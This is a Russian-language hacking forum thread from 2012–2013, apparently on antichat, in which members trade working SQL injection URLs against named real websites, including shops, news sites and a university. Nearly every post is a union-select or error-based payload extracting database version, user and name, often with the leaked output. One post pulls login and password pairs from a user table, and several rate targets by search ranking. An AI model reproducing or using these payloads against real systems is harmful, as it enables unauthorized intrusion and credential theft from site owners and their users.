SQL Инъекции

qwwertty · 18 Dec 2012

Code:

[email protected]
5.0.92-log
_ttp://creationcare.org/category.php?blog=1&category=36+union+select+1,2,database(),4,user(),6,7,8,9,10+--+

Вывод внизу страницы.

Антибоян>>> _http://www.google.ru/search?q=creationcare.org+site%3Aforum.antichat.ru

Code:

ttp://mobilelocalnews.com/partners.php?id=131+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,user%28%29,database%28%29,version%28%29,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113+--+

qwwertty · 22 Dec 2012

Code:

_ttp://www.dracoders.com/games.php?id=7+and+1=2+union%28select+1,2,%28user%28%29%29,%28database%28%29%29,%28version%28%29%29%29+--+

_ttp://www.google.ru/search?q=dracoders.com+site%3Aforum.antichat.ru

Code:

_ttp://www.kbnusa.com/prod_detail.php?m=e&id=9+and+4=9+unIon+select+1,2,3,4,convert%28database%28%29+using+latin1%29,6,convert%28version%28%29+using+latin1%29,convert%28user%28%29+using+latin1%29,9,10,11,12,13,14,15,16,17,18,19,20+--+

Code:

_ttp://www.micatrone.se/prod_detail.php?secID=1&lang=gb&catID=24&main=36&id=15+and+1=2+union%28select+1,2,3,4,5,6,database%28%29,user%28%29%29+--+

Вывод в тайтле // Кажись фильтрует version()

FunOfGun · 23 Dec 2012

Нашел неделю назад, не чекал, но врядли что-то прикрыли.

Code:

 
http://familynewsabout.com/aboutBook.php?id=-3241%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20--
http://www.gordonsmithguitars.com/products/category.php?id=-1%20union%20select%201,version(),3,4,5%20--
http://www.bzpower.com/story.php?ID=-4541%20union%20select%201,2,3,4,5,6,7,version(),9,10,11,12,13,14%20--
http://www.miamacdonald.com/a.php?id=-42%20union%20select%201,version(),3,4,5,6%20--
http://www.henleystandard.co.uk/news/news.php?id=799582%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12%20--
http://www.norcotek.com/category.php?id=-8%20union%20select%201,version(),3,4,5,6%20--

qwwertty · 24 Dec 2012

Protocoler said:
Немогу найти количество полей в ручную (
Code:
http://www.route66.com.ua/index.php?id=59
Click to expand...
Code:
_ttp://www.route66.com.ua/index.php?id=59+and+4=9+union+select+1,2,3,4,concat_ws%28version%28%29,user%28%29,database%28%29%29,6+--+

AC//DC · 26 Dec 2012

http://pkteks.kz/index.php?opt=cat&part=-61%20and%201=2%20union%20select%201,concat_ws(char(58),@@version,user(),database()),3,4,5--

5.0.95 [email protected] pkteksk_db

в наличии имеются таблицы admin, users

ukrpunk · 26 Dec 2012

PHP:

http://www.sova72.ru/index.php?option=com_sova&task=rent&ID=-555+union+select+1,2,3,4,5,6,7,8,541564644,10,11,12,13,14,111,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--

tic80 pr4

ErnanCortes · 28 Dec 2012

http://dkm.ru:80/default.php?rubrica=5&D=27&M=11&Y=2011&id=340
Click to expand...

тиц 170 pr3

GhostW · 31 Dec 2012

Code:

http://www.fmdanmark.dk/debatf orum/show_topic .php?start=1110&e nd=10&id=-702 5+uni on+s elect+1,2,3,co ncat_ws(char(58), @ @version,user(),databa se()),5,6--

GhostW · 1 Jan 2013

Code:

h??p://www.pizzahut-lb.com/pizzahut/pizzahutmenu.php?catid=-3+union+se lect+1,2,3,4,CONCAT_WS(CHAR(32,58,32)[COLOR=DarkGreen],user(),data[/COLOR]base(),version())--

qaz · 1 Jan 2013

cleper.ru

PHP:

http://www.cleper.ru/news/description.php?n=1016%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

5.1.66
(CY)375
==============================================
ippp.ru

PHP:

http://www.ippp.ru/content.php?content=forumadd&tree=11&id=976&subid=979+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

5.1.41-log
(CY)70
==============================================
zhuravlev.info

PHP:

http://zhuravlev.info/modules.php?name=Eponyms_Web&op=article&rg=522&k=521&id=860+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

5.1.66
(CY)230
==============================================
8kob.ru

PHP:

http://www.8kob.ru/note.php?id=976+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

5.1.41-log
(CY)10
==============================================
banksinfo.kiev.ua

PHP:

http://www.banksinfo.kiev.ua/analitics?id=982+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

5.1.61
(CY)90
==============================================

GhostW · 2 Jan 2013

Code:

_?tp://www.lnyp.org/releasesdetails.php? pubid=-16+union+select+1,2,3,CO NCAT_WS(CH AR(32,58,32),user(),dat abase(),ve rsion()),5,6,7,8--

ukrpunk · 4 Jan 2013

pr7

Code:

http://www.cput.ac.za/index.php?option=com_jumi&fileid=11&cid=235+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

MaxFast · 4 Jan 2013

Code:

http://avto.kz/modules/news/news.php?id=-5'+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9+--+

avto@localhost:avto:5.5.25-log

Always · 5 Jan 2013

http://www.tv[antichat]sale.ru/catalog/-men%27+union+select+1,2,3,4,5,version%28%29,7,8+--+

GhostW · 6 Jan 2013

Code:

http://www.alkayanlb.net/ar/activitydetails.php?id=-112+union+select+1,CONCAT_WS(CH AR(32,58,3 2),user(),da tabase(),version()),3,4,5,6--

FunOfGun · 7 Jan 2013

http://support.iquest.net/new.php?id=-20'+union+select+1,2,3,4,@@version,6,7,8+--+
http://www.iec.org.af/eng/content.php?id=1&cnid=-5+/*!union*/select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14+--+
http://www.kingsway-tyres.co.uk/branch_details.php?id=-8+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
http://www.worstpreviews.com/headline.php?id=-15131+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12+--+
http://www.hkyongnuo.com/e-detail.php?ID=-288+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+--+
http://www.goldeneyevault.com/viewfile.php?id=-104+union+select+1,2,3,4,5,6,7,8,9,@@version,11,12,13+--+

GhostW · 7 Jan 2013

Code:

http://www.chemalylighting.com/modernlighting.php?catid=-2+union+select+1,2,3,4,CONC AT_WS(CH AR(32,58,32),u ser(),datab ase(),versi on()),6--

mix0x0 · 8 Jan 2013

Атомный Страховой Брокер (тИЦ: 40 / PR: 3)

Code:

[B][COLOR=YellowGreen]Atombroker.ru[/COLOR][/B]/news/?t=3&id=[B][COLOR=Red]-[/COLOR][/B]5093[B][COLOR=Red]+union+select+1,group_concat(concat_ws(char(32,58,32),login,pwd)),3+from+user_list--+[/COLOR][/B]m

GhostW · 8 Jan 2013

Code:

http://www.mega-aa.com/newsdetails.php?cid=-3+union+select+1,databas e%28%29,3,4,5,6,ve rsion%28%29,us er%28%29--

nemaniak · 9 Jan 2013

shebenka.su ТИЦ-240

Code:

www.shebenka.su/index.php?menu_id=12&type_id=2&subtype_id=626&item_id=-79791+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+&step=2

Code:

4.0.27:[email protected]:ipkshop

SQL Инъекции

qwwertty New Member

qwwertty New Member

FunOfGun Elder - Старейшина

qwwertty New Member

AC//DC Active Member

ukrpunk Member

ErnanCortes New Member

GhostW Member

GhostW Member

qaz Elder - Старейшина

GhostW Member

ukrpunk Member

MaxFast Elder - Старейшина

Always New Member

GhostW Member

FunOfGun Elder - Старейшина

GhostW Member

mix0x0 Active Member

GhostW Member

nemaniak Elder - Старейшина

Useful Searches

SQL Инъекции

qwwertty New Member

qwwertty New Member

FunOfGun Elder - Старейшина

qwwertty New Member

AC//DC Active Member

ukrpunk Member

ErnanCortes New Member

GhostW Member

GhostW Member

qaz Elder - Старейшина

GhostW Member

ukrpunk Member

MaxFast Elder - Старейшина

Always New Member

GhostW Member

FunOfGun Elder - Старейшина

GhostW Member

mix0x0 Active Member

GhostW Member

nemaniak Elder - Старейшина